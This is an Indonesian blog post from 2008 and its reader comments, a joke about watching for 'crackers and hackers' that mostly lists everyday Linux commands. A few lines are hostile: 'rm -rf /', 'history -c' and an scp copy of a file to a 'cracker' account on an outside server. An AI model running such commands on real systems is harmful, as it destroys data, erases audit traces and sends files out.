23 October 2008

Awas Ada Cracker dan Hacker!!!

Saat rapat tentang rencana IRP ada beberapa hal yang harus diwaspadai.
Salah duanya adalah Cracker dan Hacker.

Saya juga mendengar hal tersebut jadi harus waspada.
Anda pun mungkin juga harus waspada.
Salah satu penyebabnya adalah akan rilis nya Ubuntu 8.10.

Saya bingung antara cracker dan hacker beraksi.
Bisa jadi hanya hacker saja atau cracker saja atau dua-duanya.
Berikut beberapa perilaku cracker dan hacker versi saya (silahkan anda menambahkan sendiri) :
- rm -rf (paling bahaya rm -rf /)
- history -c
- cp fileasal /direktori_ngawur
- netstat
- route -n
- ifconfig
- dig
- scp fileasal cracker@serverluar:~/
- mv fileasal filebaru
- ./configure && make && make install
- apt-get update && apt-get dist-upgrade
- adduser
- mount
- umount
- iwconfig
- tail -f
- reboot
- poweroff
- cat
- less
- more
- grep
- vim
- pico
- ps ax
- dll (masih banyak lagi tool-tool standar yg digunakan)

Intinya WASPADALAH!!!!
Mohon masukkannya dengan menambahkan di komentar blog ini.

6 comments:

  1. Ini hanya cerita lucu saja.
    "cracker@localhost dan hacker@localhost"
    :D

    ReplyDelete
  2. Konotasi negatif terhadap hacker hanya akan membuat para hacker tersinggung. Apalagi menyamakannya dengan cracker yang sudah jelas kriminal.

    ReplyDelete
  3. @mdamt
    Oleh sebab itu cracker dan hacker saya pisah.
    Karena hal tersebut sudah berbeda.
    Saat merusak itulah cracker.
    Saat membangun dalam kritik atau yg hal yg positif itulah hacker.
    Namun ada juga yang mempunyai perilaku dua-duanya.

    cmiiw.

    ReplyDelete
  4. Wah,,kalo menurut saya yang perlu diwaspadai yaitu Cracker bukannya Hacker(WhiteHat).
    Nambahin ya mas..
    # arp -a
    *cmiiw*

    ReplyDelete
  5. haduw... kok aku gak ngerti sama sekali dengan maksud post yang ini yah...

    perlu banyak belajar lagi rupana...

    ReplyDelete
  6. @hurie
    postingan ini cuma becanda tidak ada maksud yg nggak-nggak.
    sebenarnya nge-hack itu gampang karena yang di-hack komputer sendiri.
    hacking lebih cenderung untuk memperbaiki jadi sifatnya positif.
    :D
    makanya hacker@localhost :)

    ReplyDelete

Disqus for Dedy selalu Milisdad